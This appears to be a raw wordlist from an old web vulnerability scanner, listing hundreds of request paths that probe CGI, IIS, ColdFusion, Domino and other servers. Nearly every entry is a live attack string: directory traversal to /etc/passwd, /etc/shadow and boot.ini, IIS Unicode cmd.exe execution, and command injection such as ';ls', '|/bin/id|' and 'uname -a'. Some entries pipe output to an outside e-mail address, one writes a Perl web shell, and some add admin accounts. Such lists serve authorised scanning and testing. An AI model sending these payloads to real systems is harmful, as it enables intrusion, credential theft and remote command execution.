/msadc/Samples/SELECTOR/showcode.asp
/msadc/msadcs.dll
/msads/Samples/SELECTOR/showcode.asp
/ncl_items.html
/order/order.log
/orders/checks.txt
/orders/import.txt
/orders/mountain.cfg
/orders/orders.txt
/pingall
/ping?SomeCrapHere
/piranha/secure/passwd.php3
/pw/storemgr.pw
/quikstore.cfg
/samples/search/queryhit.htm
/scripts
/scripts/CGImail.exe
/scripts/c32web.exe/ChangeAdminPassword
/scripts/cart32.exe/cart32clientlist
/scripts/cmd.exe
/scripts/convert.bas
/scripts/counter.exe
/scripts/dbman/db.cgi?db=invalid-db
/scripts/emurl/RECMAN.dll
/scripts/fpcount.exe
/scripts/iisadmin/ism.dll?http/dir
/scripts/issadmin/bdir.htr
/scripts/no-such-file.pl
/scripts/proxy/w3proxy.dll
/scripts/slxweb.dll
/scripts/tools/mkilog.exe
/scripts/tools/newdsn.exe
/scripts/uploadn.asp
/scripts/wa.exe
/scripts/webbbs.exe
/scripts/wsisa.dll
/search97.vts
/server-status
/showfile.asp
/ssi/envout.bat
/ws_ftp.ini
/~
/~bin
/~guest
/~log
/~logs
/~lp
/~named
/~root
/~test
/~tmp
/test.php3
/cgi-bin/test.php3
/cgi-bin/cgiemail/uargg.txt
/cgi-bin/web2mail.cgi
/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/hosts
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/example.jsp../
/example%2ejsp
/example.jsp..
/index.jsp..
/test.jsp..
/example.jsp%81
/index.JSP
/index.jsp../
/test.jsp../
/index%2ejsp
/test%2ejsp
/index.JHTML
/*.jhtml/
/*.jsp/
/ConsoleHelp/
/*.shtml/
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=
/cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&order=2&searchkey=&search_fldnum=0&page=99999&html=
/cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0als
/..\..\..\winnt\repair\sam._
:80/../../../autoexec.bat
/......autoexec.bat
/.html/............/autoexec.bat
/....../
/..../
/inc/
/include/
/iisadmpwd/
/iissamples/
/scripts/iisadmin/ism.dll%3fhttp/dir
/iisadmin/ism.dll%3fhttp/dir
/global.asa
/global.asa+.htr
/global.asa/default.asp+.htr
/main.asp+.htr
/_vti_bin/shtml.dll/tstt.htm
/_vti_log/author.log
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_private/form_results.txt
/secret/index.html
/secret/index.htm
/cgi-bin/commander.pl
/cgi-bin/test.pl
/cgi-bin/test.cgi
/cgi-bin/webgais
/cgi-bin/perl
/perl
/scripts/perl.exe
/wwwboard/wwwboard.pl
/wwwboard/wwwadmin.pl
/wwwboard/wwwadmin.cgi
/cgi-bin/wwwadmin.cgi
/cgi-bin/fi
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename=99.10.28.15.23.username.|/bin/ls|
/cgi-bin/wais.pl
/scripts/wguest.exe
/cgi-bin/test.exe
/scripts/test.exe
/scripts/test.bat
/cgi-bin/search.cgi%3fletter=
/cgi-bin/infogate
/search97/s97_cgi.exe
/search97/search97.vts
/cgi-bin/dumpenv.pl
/session/adminlogin?RCpage=/sysadmin/index.stm
/cgi-shl
/scripts/bdir.htr
/scripts/files.pl
/domcfg.nsf/%3fopen
/domcfg.nsf/URLRedirect/%3fOpenForm
/domcfg.nsf/viewname%3fSearchView&Query="*"
/log.nsf
/domlog.nsf
/names.nsf
/catalog.nsf
/database.nsf?EditDocument
/names.nsf/Open
/cgi-bin/mailform.pl
/cgi-bin/mailto.cgi
/cgi-bin/mailform.cgi
/cgi-bin/formto.pl
/cgi-bin/bnbform.pl
/cgi-bin/bnbform
/htbin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls|
/cgi-bin/environ.pl
/cgi-bin/carbo.dll
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/viewexample.cfm?Tagname=
/cfdocs/snippets/setlocale.cfm
/cgi-bin/query%3f
:9000/cgi-bin/query%3f
/cgi-bin/admin.cgi
/cgi-bin/ppdscgi.exe
/ppwb/Temp/
:8010/c://
:8010/d://
:8010//
:8010/..../
:8010/
:5000/
:2301
:3128/../../../../
:9090
:901
:8383
:800/../..:800/C:/
/scripts/repost.asp
/SPSamp/AdvWorks/equipment/catalog_type.asp
/cgi-bin/foo.cmd?xxx&dir
/scripts/foo.cmd?xxx&dir
/cgi-dos/foo.cmd?xxx&dir
/cgi-bin/script.bat%3f&dir
/scripts/script.cmd%3f&dir
/scripts/script.bat%3f&dir
/cgi-bin/tst2.bat
/cgi-bin/post32.exe
/cgi-bin/post16.exe
/cgi-bin/get16.exe
/cgi-bin/lsin.exe
/cgi-bin/lsindex2.bat
/cgi-bin/imapcern.exe
/cgi-bin/imapncsa.exe
/cgi-bin/aliredir.exe
:8080/../../../conf/Eserv.ini
:3128/../../../conf/Eserv.ini
:801/../../../../../../../../etc/hosts
:8888/
:9998/
/publisher/
/bigconf.cgi
/cgi-bin/bigconf.cgi
/scripts/bigconf.cgi
/cgi-bin/ftpdiag.cgi
/cgi-bin/OrderForm.cgi
/cgi-bin/flexform.cgi
/ows-bin/owa/owa%5futil%2esignature
/ows-bin/owa/owa%5futil%2eshowsource
/ows-bin/perlidlc.bat?&dir
/ows-bin/*.bat?&dir
:8003/Display
/cgi-bin/whois.cgi
/minivend/catalog.cfg
/cgi-bin/simple
/cgi-bin/simple/config/menu
/cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg
/cgi-bin/simple/view_page.html?mv_arg=|/bin/ls|
/search%3f
/suche%3f
/search/iaquery.exe%3f
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
/cgi-bin/w3-msql/index.html
/msadc/samples/adctest.asp
/scripts/tools/getdrvrs.exe
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=c:\web.mdb&newdb=CREATE_DB&attr=
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/cgi-bin/forum.pl
/cgi-bin/forum-admin.pl
/cgi-bin/sendmail.cgi
/cgi-bin/guestadd.pl
/manage/cgi/cgiproc?Nocfile=
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=&CiRestriction=none&CiHiliteType=Full
/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/wwwthreads/changedisplay.pl
/scripts/wsisa.dll/WService=anything?WSMadmin
/cgi-bin/Ultimate.cgi
/cgi-bin/forumdisplay.cgi
/ubb/cgi-bin/postings.cgi
/cgi-bin/postings.cgi
/cgi-bin/core
/cgi-bin/echo.bat
/cgi-bin/hello.bat
/cgi-bin/htsearch?exclude=%60%60
/cgibin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
/cgi-bin/rmp_query
/cgi-bin/.fhp
/cgi-bin/uploadn.asp
/cgi-bin/sojourn.cgi?cat=ng%00
/cgi-bin/abuse.man?file=&domain=&script=
/jsp/source.jsp
/cgi-bin/dfire.cgi
/cd/../config/html/cnf_gi.htm
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts
/ccbill/
/cgi-bin/windmail.exe?-n%20c:\boot.ini%20swoopme@@hotmail.com
/cgi-bin/windmail.exe?%20|%20dir%20c:/cgi-bin/dcforum/install_help.cgi
/doc/
/scripts/slxweb.dll/admin
/cgi-bin/getdoc.cgi
/cgi-bin/webplus?script=
/cgi-bin/scripts/cart.pl
/cgi-bin/scripts/cart.pl?vars
/cgi-bin/scripts/cart.pl?env
/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20swoopme@@hotmail.com|&f6=^a.*&action=searchdbdisplay
/_vti_bin/_vti_aut/mtd2lv.dll
/piranha/secure/passwd.php3?username=piranha&passwd=q
/cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/scripts/cart32.exe/cart32clientlist?passwd=wemilo
/cgi-bin/cart32.exe/expdate
/scripts/dbman/db.cgi?db=tedb
/scripts/process_bug.cgi
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/scripts/emurl/RECMAN.dll?
/cgi-bin/allmanage.cgi
/cgi-bin/ads.cgi
/ads/admin.cgi
/ads/adpassword.txt
/scripts/Carello/add.exe
:8000/cgi/wja?page=wja
/robots.txt
/file/index.jsp
/file/main.jsp
/file/main.shtml
/file/index.shtml
/file/main.jhtml
/file/index.jhtml
/cgi-bin/showfile
/servlet/SessionServlet
/servlet/viewsource.jsp
/viewsource.jsp
:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00
/cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00
/site/eg/source.asp
/eg/source.asp
/cgi-bin/source.asp
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts
/cgi-bin/msn.cgi
/cgi-bin/disk2server.cgi
/cgi-bin/upload.cgi
/.www.my.cnf
/cgi-bin/.www.my.cnf
/cgi-bin/futureforum.cgi
/examples/applications/bboard/bboard_frames.html
/admin-serv/config/admpw
/https-admserv/config/admpw
/cgi-bin/cookmail
/cgi-bin/cookmail/cookmail
/cgi-bin/cookmail/cookmail.exe
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
/active.log
/cgi/cvsweb.cgi
/cgi-bin/cvsweb.cgi
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastname=LA&course_id=SID&password1=NEWPWD&password2=NEWPWD
/cgi-bin/ssi//../../../../../../../../../etc/hosts
:8080/examples/jsp/snp/anything.snp
:8080/anything.jsp
/anything.jsp
/examples/jsp/snp/anything.snp
/pservlet.html
/cgi-bin/mailto?MailTo=swoopme@hotmail.com&text=tst&EmailForm=/cgi-bin/mailto
/cgi-bin/mailfile?MailTo=swoopme@hotmail.com&FileName=mailfile:c&Subject=tst&MailFrom=tst@no.net
/cgi-bin/mailfile.cgi?real_name=rc&email=swoopme@hotmail.com&filename=mailfile.cgi
/cgi-bin/formprocessor.asp?MailTo=swoopme@hotmail.com&MailFrom=tst@no.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/cgi-bin/af.cgi
/%00/
/admin/
:8080/tea/dynamic/system/teaservlet/Admin?admin=true
/servlet/file
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
/servlet/test/pathInfo/test
/~nobody/etc/
:3000/../../hosts
:444/..\..\..\..\..\autoexec.bat
/pccsmysqladm/incs/dbconnect.inc
/include/dbconfig.inc
:8888/ab2/@Ab2Admin
:8888/cgi-bin/admin/admin
:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe
/cgi-bin/netauth.cgi?cmd=show&page=../../
/admin.php3?admin=whatever
:9090/board.html
:9090/examples/applications/bboard/bboard_frames.html
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
/cgibin/amadmin.pl?setpasswd
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini
/cgi-bin/news/news.cgi?addAuthor
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/CGImail.exe
/.photon/voyager/config.full
/cgi-bin/cpmdaemon.cgi
:8088
/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
/phpPhotoAlbum/getalbum.php?album=../../../etc/
/cgi-bin-sdb/
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00
/siteman000510/siteman.php3
/cgi-bin/multihtml.pl?multi=/etc/hosts%00html
/search.dll?search?query=%00&logic=AND
m/search.dll?search?query=/&logic=AND
:8002/Newuser?Image=../../database/rbsserv.mdb
/doc/packages/
/cp/rac/nsManager.cgi?Domain=nothing.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm
/_private/shopping_cart.mdb
/cgi-bin/webdata_test.pl
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts
/cgi-bin/ssi/cgi-bin/ssi
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../etc
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir+c:/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/cgi-bin/Web_Store/web_store.cgi?page=%00
/cgi-bin/phpinfo.php
/cgi-bin/phpinfo.php3
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:8000/servlet/ssifilter/../../test.jsp
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8000/servlet/jsp/../../tst.txt
:8100//WEB-INF/
:8100//WEB-INF/web.xml
:8100//WEB-INF/webapp.properties
/c/s.dll/pagelog.cgi?display=../../../../tmp/a
/cgi-bin/pagelog.cgi?name=../../../../../tmp/blah
/cgi-bin/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/search.pl
/admin/includes/
/cgi-bin/bb-hist.sh?HISTFILE=/home/*
/cgi-bin/bb-histlog.sh
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-rep.sh
/cgi-bin/bb-replog.sh
/cgi-bin/bb-ack.sh
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/cgi-bin/build.cgi
/build.cgi
/forums/list.php
/cgi-bin/html_page?TEMPLATE=main
/index.php3?vhosts=http://go.to
/cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html
/+/
/./
/+./
/++/
/++./
/includes/global.inc
/2600-cgi/ezmlm-cgi
/cgi-bin/ezmlm-cgi
/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00
/."./."./Perl/eg/core/findtar
/."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl
/."./."./winnt/reapir/sam._%20.pl
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
/ad.cgi?file=../../../../../../../../etc/hosts
/subscribe.pl
/cgi-bin/simplestmail.cgi?redirect=www.ibm.com&MyEmail=swoopme@hotmail.com;ls%20-alsi&submit=run
/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com
/cgi-bin/dcguest.cgi
/cgi-bin/dcguest/dcguest.cgi
/guestbook/dcguest.cgi
/index.php3.%5c../..%5cconf/httpd.conf
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/submit.php
../..
../../boot.ini
/......../
/....../autoexec.bat
/../../config.sys
/.html/............../config.sys
/?PageServices
/_AuthChangeUrl?
/_private/form_results.htm
/_private/orders.htm
/_private/orders.txt
/_private/register.htm
/_private/register.txt
/_private/registrations.htm
/_private/registrations.txt

/_vti_bin/
/_vti_bin/_vti_adm
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_aut
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut/author.exe
/_vti_pvt/access.cnf
/_vti_pvt/admin.pwd
/_vti_pvt/service.cnf
/_vti_pvt/service.stp
/_vti_pvt/services.cnf
/_vti_pvt/svcacl.cnf
/_vti_pvt/writeto.cnf
/_vti_pwd/administrators.pwd
/admcgi/contents.htm
/admin.php3
/adminlogin?RCpage=/sysadmin/index.stm
/admisapi/fpadmin.htm
/Album/
/aux
/bb-dnbd/bb-hist.sh
/cfappman/index.cfm
/cfdocs/exampleapp/publish/admin/application.cfm1/cfdocs/exampleapp/email/application.cfm
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expressions.cfm
/cfdocs/root.cfm
/cfdocs/snippets/fileexist.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/zero.cfm
/CFIDE/Administrator/startstop.html
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
/cgi-bin/
/cgi-bin/AnForm2
/cgi-bin/apexec.pl
/cgi-bin/archie
/cgi-bin/architext_query.cgi
/cgi-bin/axs.cgi
/cgi-bin/bb-hist.sh
/cgi-bin/c_download.cgi
/cgi-bin/calendar
/cgi-bin/cgiback.cgi
/cgi-bin/cgi-lib.pl
/cgi-bin/classified.cgi
/cgi-bin/cvsweb/src/usr.bin/rdist/expand.c
/cgi-bin/dasp/fm_shell.asp
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/displayTC.pl
/cgi-bin/download.cgi
/cgi-bin/enter.cgi
/cgi-bin/ews
/cgi-bin/filemail.cgi
/cgi-bin/finger?@localhost
/cgi-bin/form.cgi
/cgi-bin/guestbook.pl
/cgi-bin/GW/GWWEB.EXE
/cgi-bin/handler.cgi
/cgi-bin/htgrep
/cgi-bin/htmldocs
/cgi-bin/icat
/cgi-bin/login.cgi
/cgi-bin/logs
/cgi-bin/lwgate
/cgi-bin/lwgate.cgi
/cgi-bin/MachineInfo
/cgi-bin/maillist.cgi
/cgi-bin/message.cgi
/cgi-bin/meta.pl
/cgi-bin/minimal.exe
/cgi-bin/mlog.phtml
/cgi-bin/nlog-smb.cgi
/cgi-bin/nph-error.pl
/cgi-bin/ntitar.pl
/cgi-bin/password
/cgi-bin/password.txt
/cgi-bin/phf.cgi
/cgi-bin/phf.pp
/cgi-bin/php
/cgi-bin/post_query
/cgi-bin/redir.exe
/cgi-bin/redirect
/cgi-bin/responder.cgi
/cgi-bin/sawmill
/cgi-bin/search/search.cgi
/cgi-bin/search/tidfinder.cgi
/cgi-bin/sendform.cgi
/cgi-bin/snorkerz.bat
/cgi-bin/snorkerz.cmd
/cgi-bin/sojourn.cgi
/cgi-bin/spin_client.cgi
/cgi-bin/stats.prg
/cgi-bin/statsconfig
/cgi-bin/tablebuild.pl
/cgi-bin/testcgi.exe
/cgi-bin/test-cgi.tcl
/cgi-bin/tigvote.cgi
/cgi-bin/upload.pl
/cgi-bin/visitor.exe
/cgi-bin/w2-msql
/cgi-bin/w3-msql
/cgi-bin/w3tvars.pm
/cgi-bin/webmap.cgi
/cgi-bin/Web_store/web_store.cgi
/cgi-bin/webutils.pl
/cgi-bin/wrap.cgi
/cgi-bin/wwwboard.cgi
/cgi-bin/YaBB.pl
/cgi-win/wwwuploader.exe
/code.php3
/con
/config/check.txt
/database.nsf/
/DataBase/
/default.asp
/domcfg.nsf
/domcfg.nsf/?open
/eatme.ida
/eatme.idc
/eatme.idq
/eatme.idw
/eatme.pl
/getdrvrs.exe
/GetFile.cfm
/html/?PageServices
/iisadmin
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/index.asp::$DATA
/lpt
/main.asp%81
/neowebscript/test/senvironment.nhtml
/neowebscript/tests/load_webenv.nhtml
/neowebscript/tests/mailtest.nhtml
/officescan/cgi/jdkRqNotify.exe
/perl/files.pl
/phpPhotoAlbum/getalbum.php
/products/phpPhotoAlbum/explorer.php
/reviews/newpro.cgi
/samples/isapi/srch.htm
/samples/search/webhits.exe
/sawmill
/scripts/
/scripts/../../cmd.exe?%2FC+echo+\'hacked!\'>c:\\hello.bat
/scripts/c32web.exe
/scripts/cart32.exe
/scripts/cpshost.dll
/scripts/Fpadmcgi.exe
/scripts/iisadmin/default.htm
/scripts/iisadmin/ism.dll
/scripts/iisadmin/samples/ctgestb.htx
/scripts/iisadmin/samples/ctgestb.idc
/scripts/iisadmin/samples/details.htx
/scripts/iisadmin/samples/details.idc
/scripts/iisadmin/samples/query.htx
/scripts/iisadmin/samples/query.idc
/scripts/iisadmin/samples/register.htx
/scripts/iisadmin/samples/register.idc
/scripts/iisadmin/samples/sample.htx
/scripts/iisadmin/samples/sample.idc
/scripts/iisadmin/samples/sample2.htx
/scripts/iisadmin/samples/viewbook.htx
/scripts/iisadmin/samples/viewbook.idc
/scripts/iisadmin/tools/ct.htx
/scripts/iisadmin/tools/ctss.idc
/scripts/iisadmin/tools/dsnform.exe
/scripts/iisadmin/tools/getdrvrs.exe
/scripts/iisadmin/tools/mkilog.exe
/scripts/iisadmin/tools/newdsn.exe
/scripts/perl?
/scripts/pfieffer.bat
/scripts/pfieffer.cmd
/scripts/postinfo.asp
/scripts/pu3.pl
/scripts/run.exe
/scripts/samples/search/webhits.exe
/scripts/srchadm/admin.idq
/scripts/submit.cgi
/scripts/tools/getdrvs.exe
/scripts/upload.asp
/scripts/uploadx.asp
/scripts/visadmin.exe
/search
/secure/.htaccess
/secure/.wwwacl
/session/admnlogin
/srchadm
/ss.cfg
/stats
/status
/status.cgi
/test/test.cgi
/today.nsf
/tools/newdsn.exe
/users/scripts/submit.cgi
/webcart/
/WebSTART%20LOG
/xxxxxxx.....xxxxxxxxx/
fpdb/shop.mdb
shoponline/fpdb/shop.mdb
database/metacart.mdb
shopping/database/metacart.mdb
shop/database/metacart.mdb
metacart/database/metacart.mdb
mcartfree/database/metacart.mdb
ASP/cart/database/metacart.mdb
_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\orderinfo.txt
/%00.nsf/../lotus/domino/notes.ini
/%2e%2e/%2e%2e/%2e%2e/scandisk.log
/%2eHTACCESS
/%2ehtpasswd
/%3f.jsp
/*.jsp::$DATA/
/*.shtml/login.jsp
"/.""./.""./Perl/eg/core/findtar"
"/.""./.""./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl"
"/.""./.""./winnt/reapir/sam._%20.pl"
/..../scandisk.log
/.../
/.../.../scandisk.log
/../../shadow
/../../template/shared/indexTemplate.xml
/../../winnt/win.ini%00examples/jsp/hello.jsp
/../scandisk.log
/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+
/./WEB-INF/
/./WEB-INF/web.xml
/.box/../winnt/win.ini
/.dS_store
/.HTACCESS.
/.jsp/WEB-INF/classes/Env.java
/.ns4/../winnt/win.ini
/.nsf/../lotus/domino/notes.ini
/.nsf/../winnt/win.ini
//WEB-INF/
//WEB-INF/web.xml
//WEB-INF/webapp.properties
/\.../
/_AuthChangeUrl
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/~/
/~admin/
/~bin/
/~guest/
/~log/
/~logs/
/~lp/
/~named/
/~nobody/
/~root/
/~test/
/~tmp/
/4DBin/_/../boot.ini
/4DBin/_/../inetpub/../boot.ini
/4DBin/_/../winnt/repair/sam._
/4DBin/_/C:/inetpub/../boot.ini
/4DBin/_/C:/winnt/repair/sam._
/a.jsp//..//..//..//..//..//../winnt/win.ini
/a/
/adcycle/AdLogin.pm
/AdLogin.pm
/admin.php?upload=1&file=config.php&file_name=tmp.txt&wdir=/images/&userfile=config.php&userfile_name=tmp.txt
/admin/?op=%c0
/admin/case/case.filemanager.php/admin.php?op=move&confirm=1&do=copy&basedir=&file=/tmp/dat.dat&newfile=done.php
/administration/
/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/asearch.cnf
/AspUpload/Samples/Test11.asp
/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah
/basilix/basilix.php?username=blah;ls
/basilix/basilix.php3?username=blah;ls
/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
/cfbin/board.cgi
/CFDOCS/exampleapps/
/cgi/
/cgi/bin/test.txt;%20/bin/ls
/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:/cgi-bin/a1stats/a1disp.cgi?|/bin/ls|
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/hosts
/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts
/cgi-bin/adcycle/adcenter.cgi
/cgi-bin/af.cgi?_browser_out=|/bin/ls|
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../etc/hosts
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/hosts
/cgi-bin/bbs_forum.cgi?forum=test&read=../bbs_forum.cgi
/cgi-bin/blat.exe
/cgi-bin/board.cgi
/cgi-bin/bsguest.cgi?email=x;ls
/cgi-bin/bslist.cgi?email=x;ls
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00
/cgi-bin/CatalogMgr.pl?cartID=366&template=CatalogMgr.pl
/cgi-bin/cgiemail/uargg.txt?0=0&1=1&2=2&256=256&array=array&a=a&i=i&c=c&arr=arr
/cgi-bin/CGImail.exe?%24Attach%24=file.txt&%24To%24=swoopme@hotmail.com
/cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls|
/cgi-bin/console.exe?page_size=
/cgi-bin/cs.exe?action=
/cgi-bin/csvform.pl?file=/bin/ls%00|
/cgi-bin/cwmail.ini
